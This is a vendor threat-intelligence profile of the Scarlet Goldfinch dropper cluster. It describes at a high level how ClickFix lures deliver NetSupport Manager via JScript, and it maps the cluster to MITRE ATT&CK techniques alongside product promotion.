Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareRansomware

Scarlet Goldfinch

Scarlet Goldfinch is a Red Canary-tracked threat/activity cluster described as a dropper that uses a distribution scheme similar to SocGholish. It uses JScript files to drop NetSupport Manager onto victim systems. Red Canary reported Scarlet Goldfinch as one of its prominent "color bird" threats in 2025, ranking second in April 2025, and also identified it as a dropper threat cluster in first-half 2025 reporting. The cluster has been observed delivered through paste-and-run social engineering activity, also referred to as ClickFix or fakeCAPTCHA, in which users are tricked into pasting and executing malicious commands. Supporting reporting also notes broader delivery methods used across Red Canary-tracked prevalent threats in 2025, including fake browser updates, malvertising, SEO poisoning, compromised browser extensions, and potentially unwanted programs, but the high-confidence behavior directly attributed to Scarlet Goldfinch is the use of JScript to deploy NetSupport Manager. NetSupport Manager is a legitimate remote access tool that adversaries abuse for unauthorized remote control. No specific industries, geographies, or standalone IOCs were provided for Scarlet Goldfinch in the supplied content.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques
T1059.001PowerShellEvidence1

In most scenarios, once users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”

T1059.007JavaScriptEvidence1

Using cscript.exe to execute a command containing //e:Jscript in this way gives us a detection opportunity. Detection opportunity: Instances of wscript.exe or cscript.exe to run/interpret malicious JScript payloads

T1204User ExecutionEvidence1

The adversary is trying to entice the user into verifying or fixing something by typing a command into a terminal, run dialog box, or PowerShell.

Collection

1 technique
T1115Clipboard DataEvidence1

the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with “verification steps.”

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1

By following the “verification steps,” the user inadvertently runs the command and additional commands will reach out and download malware or tools.

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping5

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.